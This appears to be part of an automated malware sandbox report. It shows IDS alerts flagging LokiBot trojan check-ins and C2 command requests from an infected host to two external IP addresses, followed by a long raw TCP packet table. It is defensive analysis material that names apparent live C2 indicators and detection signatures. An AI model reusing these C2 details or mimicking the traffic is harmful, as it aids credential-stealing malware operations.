                        02/10/22-10:23:09.667688TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.22172.67.197.66
                        02/10/22-10:23:09.667688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.22172.67.197.66
                        02/10/22-10:23:10.711121TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.22172.67.197.66
                        02/10/22-10:23:10.711121TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.22172.67.197.66
                        02/10/22-10:23:10.711121TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.22172.67.197.66
                        02/10/22-10:23:10.711121TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.22172.67.197.66
                        02/10/22-10:23:11.750459TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.22172.67.197.66
                        02/10/22-10:23:11.750459TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.22172.67.197.66
                        02/10/22-10:23:11.750459TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.22172.67.197.66
                        02/10/22-10:23:11.750459TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.22172.67.197.66
                        02/10/22-10:23:12.826739TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.22172.67.197.66
                        02/10/22-10:23:12.826739TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922980192.168.2.22172.67.197.66
                        02/10/22-10:23:12.826739TCP2025381ET TROJAN LokiBot Checkin4922980192.168.2.22172.67.197.66
                        02/10/22-10:23:12.826739TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922980192.168.2.22172.67.197.66
                        02/10/22-10:23:13.916425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923080192.168.2.22172.67.197.66
                        02/10/22-10:23:13.916425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923080192.168.2.22172.67.197.66
                        02/10/22-10:23:13.916425TCP2025381ET TROJAN LokiBot Checkin4923080192.168.2.22172.67.197.66
                        02/10/22-10:23:13.916425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923080192.168.2.22172.67.197.66
                        02/10/22-10:23:14.928309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923180192.168.2.22104.21.49.244
                        02/10/22-10:23:14.928309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923180192.168.2.22104.21.49.244
                        02/10/22-10:23:14.928309TCP2025381ET TROJAN LokiBot Checkin4923180192.168.2.22104.21.49.244
                        02/10/22-10:23:14.928309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923180192.168.2.22104.21.49.244
                        02/10/22-10:23:16.169339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923280192.168.2.22172.67.197.66
                        02/10/22-10:23:16.169339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923280192.168.2.22172.67.197.66
                        02/10/22-10:23:16.169339TCP2025381ET TROJAN LokiBot Checkin4923280192.168.2.22172.67.197.66
                        02/10/22-10:23:16.169339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923280192.168.2.22172.67.197.66
                        02/10/22-10:23:17.425743TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923480192.168.2.22104.21.49.244
                        02/10/22-10:23:17.425743TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923480192.168.2.22104.21.49.244
                        02/10/22-10:23:17.425743TCP2025381ET TROJAN LokiBot Checkin4923480192.168.2.22104.21.49.244
                        02/10/22-10:23:17.425743TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923480192.168.2.22104.21.49.244
                        02/10/22-10:23:18.783854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923580192.168.2.22104.21.49.244
                        02/10/22-10:23:18.783854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923580192.168.2.22104.21.49.244
                        02/10/22-10:23:18.783854TCP2025381ET TROJAN LokiBot Checkin4923580192.168.2.22104.21.49.244
                        02/10/22-10:23:18.783854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923580192.168.2.22104.21.49.244
                        02/10/22-10:23:19.840840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923680192.168.2.22172.67.197.66
                        02/10/22-10:23:19.840840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923680192.168.2.22172.67.197.66
                        02/10/22-10:23:19.840840TCP2025381ET TROJAN LokiBot Checkin4923680192.168.2.22172.67.197.66
                        02/10/22-10:23:19.840840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923680192.168.2.22172.67.197.66
                        02/10/22-10:23:20.970687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923780192.168.2.22172.67.197.66
                        02/10/22-10:23:20.970687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923780192.168.2.22172.67.197.66
                        02/10/22-10:23:20.970687TCP2025381ET TROJAN LokiBot Checkin4923780192.168.2.22172.67.197.66
                        02/10/22-10:23:20.970687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923780192.168.2.22172.67.197.66
                        02/10/22-10:23:22.072758TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923880192.168.2.22172.67.197.66
                        02/10/22-10:23:22.072758TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923880192.168.2.22172.67.197.66
                        02/10/22-10:23:22.072758TCP2025381ET TROJAN LokiBot Checkin4923880192.168.2.22172.67.197.66
                        02/10/22-10:23:22.072758TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923880192.168.2.22172.67.197.66
                        02/10/22-10:23:23.139723TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14923980192.168.2.22172.67.197.66
                        02/10/22-10:23:23.139723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4923980192.168.2.22172.67.197.66
                        02/10/22-10:23:23.139723TCP2025381ET TROJAN LokiBot Checkin4923980192.168.2.22172.67.197.66
                        02/10/22-10:23:23.139723TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24923980192.168.2.22172.67.197.66
                        02/10/22-10:23:25.193411TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924080192.168.2.22172.67.197.66
                        02/10/22-10:23:25.193411TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924080192.168.2.22172.67.197.66
                        02/10/22-10:23:25.193411TCP2025381ET TROJAN LokiBot Checkin4924080192.168.2.22172.67.197.66
                        02/10/22-10:23:25.193411TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924080192.168.2.22172.67.197.66
                        02/10/22-10:23:26.759435TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924180192.168.2.22104.21.49.244
                        02/10/22-10:23:26.759435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924180192.168.2.22104.21.49.244
                        02/10/22-10:23:26.759435TCP2025381ET TROJAN LokiBot Checkin4924180192.168.2.22104.21.49.244
                        02/10/22-10:23:26.759435TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924180192.168.2.22104.21.49.244
                        02/10/22-10:23:27.802325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924280192.168.2.22104.21.49.244
                        02/10/22-10:23:27.802325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924280192.168.2.22104.21.49.244
                        02/10/22-10:23:27.802325TCP2025381ET TROJAN LokiBot Checkin4924280192.168.2.22104.21.49.244
                        02/10/22-10:23:27.802325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924280192.168.2.22104.21.49.244
                        02/10/22-10:23:28.801702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924380192.168.2.22172.67.197.66
                        02/10/22-10:23:28.801702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924380192.168.2.22172.67.197.66
                        02/10/22-10:23:28.801702TCP2025381ET TROJAN LokiBot Checkin4924380192.168.2.22172.67.197.66
                        02/10/22-10:23:28.801702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924380192.168.2.22172.67.197.66
                        02/10/22-10:23:29.791359TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924480192.168.2.22172.67.197.66
                        02/10/22-10:23:29.791359TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924480192.168.2.22172.67.197.66
                        02/10/22-10:23:29.791359TCP2025381ET TROJAN LokiBot Checkin4924480192.168.2.22172.67.197.66
                        02/10/22-10:23:29.791359TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924480192.168.2.22172.67.197.66
                        02/10/22-10:23:30.804451TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924580192.168.2.22172.67.197.66
                        02/10/22-10:23:30.804451TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924580192.168.2.22172.67.197.66
                        02/10/22-10:23:30.804451TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22172.67.197.66
                        02/10/22-10:23:30.804451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22172.67.197.66
                        02/10/22-10:23:31.841168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22172.67.197.66
                        02/10/22-10:23:31.841168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22172.67.197.66
                        02/10/22-10:23:31.841168TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22172.67.197.66
                        02/10/22-10:23:31.841168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22172.67.197.66
                        02/10/22-10:23:32.863722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22172.67.197.66
                        02/10/22-10:23:32.863722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22172.67.197.66
                        02/10/22-10:23:32.863722TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22172.67.197.66
                        02/10/22-10:23:32.863722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22172.67.197.66

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Feb 10, 2022 10:21:50.148709059 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.261291027 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.261378050 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.261872053 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.385209084 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385242939 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385256052 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385267019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385279894 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385297060 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385313034 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385329962 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385346889 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385364056 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.385413885 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.386713982 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.398227930 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.497762918 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497796059 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497813940 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497829914 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497843027 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497869015 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.497876883 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497900009 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497900963 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.497920990 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.497925043 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.497939110 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.497953892 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502103090 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502135992 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502152920 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502172947 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502180099 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502196074 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502212048 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502214909 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502219915 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502230883 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502244949 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502262115 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502269030 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502276897 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502290964 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502310991 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502311945 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502329111 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502335072 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502346039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502358913 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.502370119 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502393961 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.502480030 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610299110 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610330105 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610347033 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610369921 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610374928 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610393047 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610408068 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610410929 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610425949 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610477924 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610522985 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610563040 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610606909 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610723972 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610761881 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610779047 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610796928 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610820055 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610820055 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610835075 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610847950 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610851049 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610867977 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610887051 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610889912 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610899925 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610913038 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610928059 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610934973 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.610943079 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.610970020 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.611434937 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614706993 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614736080 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614754915 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614767075 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614779949 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614790916 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614793062 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614804983 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614820957 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614828110 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614845991 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614851952 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614866018 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614871979 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614881039 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614895105 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614916086 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614917040 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614928007 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614940882 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614948988 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614962101 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614979029 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.614984989 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.614993095 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615010023 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615025043 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615032911 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615041971 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615055084 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615070105 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615077972 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615084887 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615099907 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615113020 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615123034 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615129948 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615144968 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615156889 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615168095 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615206957 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615223885 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615243912 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615246058 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.615259886 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615277052 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.615833044 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723398924 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723437071 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723449945 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723469019 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723489046 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723505974 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723529100 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723547935 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723565102 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723579884 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723587990 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723613024 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723613024 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723630905 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723634958 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723638058 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723658085 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723664045 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723675966 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723687887 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723695040 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723709106 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723730087 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723731041 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723743916 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723754883 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723759890 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723777056 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723794937 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723799944 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723809004 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723822117 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723836899 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723846912 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723850965 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723867893 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723885059 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723891020 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723897934 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723912954 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.723929882 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.723942041 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.724605083 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.727976084 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728010893 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728030920 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728053093 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728075981 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728091955 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728097916 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728117943 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728125095 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728128910 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728132963 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728149891 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728169918 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728173971 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728185892 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728199959 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728209019 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728221893 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728245020 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728245974 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728257895 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728271961 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728281975 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728296995 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728310108 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728322029 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728334904 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728346109 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728355885 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728369951 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728384018 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728395939 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728399038 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728419065 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728419065 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728430033 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728441954 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728455067 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728466988 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728477955 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728488922 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728501081 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728513002 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728524923 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728534937 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.728549957 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728568077 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728769064 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.728945971 CET4916580192.168.2.22198.46.132.195
                        Feb 10, 2022 10:21:50.836253881 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836293936 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836308956 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836323023 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836343050 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836360931 CET8049165198.46.132.195192.168.2.22
                        Feb 10, 2022 10:21:50.836383104 CET8049165198.46.132.195192.168.2.22
